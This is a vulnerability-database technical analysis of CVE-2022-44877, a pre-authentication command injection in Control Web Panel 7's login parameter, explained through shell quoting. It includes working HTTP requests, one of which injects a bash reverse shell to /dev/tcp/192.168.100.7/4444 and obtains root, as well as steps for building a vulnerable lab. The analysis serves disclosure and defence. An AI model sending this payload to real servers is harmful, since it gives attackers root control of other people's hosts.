Attacker Value
Very High
(1 user assessed)
Exploitability
Very High
(1 user assessed)
User Interaction
None
Privileges Required
None
Attack Vector
Network
3

CVE-2022-44877

Disclosure Date: January 05, 2023
Exploited in the Wild
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Execution
Techniques
Validation
Validated
Validated
Initial Access
Techniques
Validation
Validated

Description

login/index.php in CWP (aka Control Web Panel or CentOS Web Panel) 7 before 0.9.8.1147 allows remote attackers to execute arbitrary OS commands via shell metacharacters in the login parameter.

Add Assessment

3
Ratings
Technical Analysis

This vulnerability is all about “Why Quotes Matter”

In December 2022, security researcher Numan Türle from Gais Cyber Security discovered an unauthenticated remote code execution vulnerability in the Control Web Panel 7 (CWP) application. They state on their website that CWP is a World Leading advanced Free and PRO web hosting panel that gives you all the flexibility to effectively and efficiently manage your server and clients.

The vulnerability is exposed thru the admin endpoint /login/index.php?login which typically runs on port 2030 or 2086 for http and port 2031 and port 2087 for https. Successful exploitation results in command execution as the root user. CWP versions 0.9.8.1146 and below are vulnerable.

The issue is triggered by the improper use of quotes when a failed login entry is logged in the /var/log/cwp_client_login.log.
The example below shows why the proper usage of quotes is important when applied in a unix shell.

[root@localhost ~]# echo "$(whoami)"
root
[root@localhost ~]# echo '$(whoami)'
$(whoami)
[root@localhost ~]# echo "'$(whoami)'"
'root'
[root@localhost ~]# echo ''$(whoami)''
root

In the first example, the inline bash command $(whoami) gets executed within the echo command using double quotes.
However, if you use single quotes, it is treated as text which is the standard unix shell behavior. But if you try to be smart and put double quotes around the single quotes, it again executes $(whoami) because the single quotes are seen as text if surrounded by double quotes.
This is no secret to experienced unix admins, but typically software developers can be easily tricked when they use underlying unix shell commands and quotes in their programs.

And this is exactly the problem that triggers this vulnerability.
Let’s have a quick look, what is going under the hood….

Take the burp request below, where we will trigger a failed login entry using the existing default user root with a wrong password.

POST /login/index.php?login= HTTP/1.1
Host: 192.168.100.89:2031
Content-Length: 46
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en
Connection: close

username=root&password=idonotcare&commit=Login

If we monitor the /var/log/cwp_client_login.log then we can see an failed login entry.

[root@localhost ~]# tail -f /var/log/cwp_client_login.log
2023-01-14 17:37:04 root Failed Login from: 192.168.100.7 on: 'https://localhost:2031/login/index.php?login='

If we do the same burp request, but now with our $(whoami) added.
And surprise, surprise, the whoami command gets executed (see second log entry).

[root@localhost ~]# tail -f /var/log/cwp_client_login.log
2023-01-14 17:37:04 root Failed Login from: 192.168.100.7 on: 'https://localhost:2031/login/index.php?login='
2023-01-14 17:40:25 root Failed Login from: 192.168.100.7 on: 'https://localhost:2031/login/index.php?login=root'

Now lets take a reverse bash shell.

POST /login/index.php?login=$(bash -i >& /dev/tcp/192.168.100.7/4444 0>&1) HTTP/1.1
Host: 192.168.100.89:2031
Content-Length: 46
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en
Connection: close

username=root&password=idonotcare&commit=Login

And voila, a reverse shell as root user on the target.

# nc -lnvp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.100.89.
Ncat: Connection from 192.168.100.89:51988.
bash: no job control in this shell
[root@localhost login]# whoami
whoami
root
You have new mail in /var/mail/root
[root@localhost login]#

Another interesting piece is that you actually can see the command running in the process list that is writing the log entry to the log file.
You can clearly see the improper use of the double quotes in this command line.

root     12238 12231  0 03:41 ?        00:00:00 sleep 17897
root     12493   910  0 03:43 ?        00:00:37 php-fpm: pool cwpsrv
postfix  27739  1538  0 07:41 ?        00:00:00 pickup -l -t fifo -u -o content_filter= -o receive_override_options=no_header_body_checks
root     29668     2  0 08:02 ?        00:00:00 [kworker/0:3]
root     30160     2  0 08:10 ?        00:00:00 [kworker/0:1]
root     30718     2  0 08:15 ?        00:00:00 [kworker/0:0]
root     30869  7118  0 08:17 ?        00:00:00 sh -c echo "2023-01-14 13:17:46 root Failed Login from: 192.168.100.7 on: 'https://localhost:2031/login/index.php?login=$(bash -i >& /dev/tcp/192.168.100.7/4444 0>&1)'" >> /var/log/cwp_client_login.log

If you want to test it yourself, please follow this guidance to build a vulnerable configuration. Please do not expose this to the Internet unless you want to be compromised ;–)
Before you execute step 7. sh cwp-el7-latest, please edit the file and make the following adjustments to download the vulnerable version and prevent the auto update.

nano /usr/local/src/cwp-el7-latest
>>>>>
# wget static.cdn-cwp.com/files/cwp/el7/cwp-el7-0.9.8.1148.zip
# unzip -o -q cwp-el7-0.9.8.1148.zip
# rm -f cwp-el7-0.9.8.1148.zip

wget static.cdn-cwp.com/files/cwp/el7/cwp-el7-0.9.8.1146.zip
unzip -o -q cwp-el7-0.9.8.1146.zip
>>>>>
# update cwp
chmod +x /scripts/cwp_api
# sh /scripts/update_cwp
sh /scripts/cwp_set_memory_limit
>>>>>

After running the installation script which takes about 30 minutes, please rename /usr/local/cwpsrv/htdocs/resources/scripts/update_cwp to update_cwp.something otherwise CWP will get updated to the latest version when you start the application.

Mitigation

The CWP application has an auto update feature that can not be disabled in the application. Therefore the likelihood to find any vulnerable CWP application in the wild is almost zero.

I have created a Metasploit module. A local version of this module can found at the References section.

References

Github
Packetstorm
Metasploit Development h00die-gr3y

Credits

Credits goes to the security researcher below who discovered and analyzed this vulnerability.

CVSS V3 Severity and Metrics
Base Score:
9.8 Critical
Impact Score:
5.9
Exploitability Score:
3.9
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Vendors

  • control-webpanel

Products

  • webpanel
Technical Analysis